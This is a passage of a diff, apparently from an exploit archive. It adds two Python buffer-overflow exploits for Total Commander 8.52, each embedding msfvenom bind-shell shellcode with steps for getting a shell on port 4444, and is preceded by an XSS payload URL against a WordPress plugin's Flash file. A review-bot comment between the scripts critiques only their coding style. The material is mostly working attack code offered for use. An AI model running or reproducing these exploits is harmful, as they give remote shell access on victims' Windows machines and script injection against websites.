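+
+http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//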
51
platforms/windows/local/38243.py
Executable file
51
platforms/windows/local/38243.py
Executable file
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/python
|
||||
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
|
||||
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
|
||||
# Credits: Un_N0n
|
||||
# Date of Testing: 19th September 2015
|
||||
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
|
||||
# Tested On : Windows 10
|
||||
# Steps to Exploit
|
||||
# Step 1: Execute this python script
|
||||
# Step 2: This script will create a file called time.txt
|
||||
# Step 3: Copy the contents of time.txt file
|
||||
# Step 4: Now open Total Commander 8.52
|
||||
# Step 5: Go To file > Change Attributes.
|
||||
# Step 6: In time field paste the contents of time.txt
|
||||
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
|
||||
file = open('time.txt' , 'wb');
|
||||
|
||||
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
|
||||
|
||||
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
|
||||
|
||||
buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
|
||||
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
|
||||
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
|
||||
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
|
||||
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
|
||||
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
|
||||
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
|
||||
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
|
||||
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
|
||||
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
|
||||
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
|
||||
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
|
||||
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
|
||||
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
|
||||
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
|
||||
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
|
||||
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
|
||||
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
|
||||
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
|
||||
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
|
||||
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
|
||||
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
|
||||
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
|
||||
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
|
||||
|
||||
buffer += "\x90" *10
|
||||
|
||||
file.write(buffer)
|
||||
|
||||
file.close()
|
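Review bot: `file` on L1690 shadows the builtin and is only closed on the happy path; the write would be clearer as a context manager under a non-shadowing name, e.g. `with open('time.txt', 'wb') as out:` / `    out.write(buffer)`, which also drops the stray semicolon on L1690 — the same applies to 38244.py (L1846, L1951, L1956), which additionally opens the file in text mode `'w'` where this script uses `'wb'`, so the two sibling scripts disagree for no stated reason. The `#!/usr/bin/python` shebang together with `str` literals written to a binary-mode handle means this is Python 2-only code; a one-line comment saying so would spare the next reader a `TypeError` on Python 3. The header (L1648-L1663) records the tested build and download link but, unlike the other advisories in this commit (e.g. 38242 at L156 and L329), says nothing about vendor notification or a fixed version.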
55
platforms/windows/local/38244.py
Executable file
55
platforms/windows/local/38244.py
Executable file
|
@ -0,0 +1,55 @@
|
|||
#!/usr/bin/python
|
||||
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
|
||||
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
|
||||
# Credits: Un_N0n
|
||||
# Date of Testing: 19th September 2015
|
||||
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
|
||||
# Tested On : Windows XP Service Pack 2
|
||||
# Steps to Exploit
|
||||
# Step 1: Execute this python script
|
||||
# Step 2: This script will create a file called time.txt
|
||||
# Step 3: Copy the contents of time.txt file
|
||||
# Step 4: Now open Total Commander 8.52
|
||||
# Step 5: Go To file > Change Attributes.
|
||||
# Step 6: In time field paste the contents of time.txt
|
||||
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
|
||||
file = open('time.txt' , 'w');
|
||||
|
||||
buffer = "\x90"*190
|
||||
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
|
||||
|
||||
buffer += "\x90"*(265- len(buffer))
|
||||
|
||||
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
|
||||
|
||||
# bad characters - \x00\x0a\x0d
|
||||
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
|
||||
|
||||
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
|
||||
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
|
||||
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
|
||||
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
|
||||
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
|
||||
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
|
||||
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
|
||||
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
|
||||
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
|
||||
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
|
||||
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
|
||||
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
|
||||
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
|
||||
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
|
||||
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
|
||||
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
|
||||
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
|
||||
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
|
||||
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
|
||||
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
|
||||
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
|
||||
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
|
||||
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
|
||||
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
|
||||
|
||||
file.write(buffer)
|
||||
|
||||
file.close()
|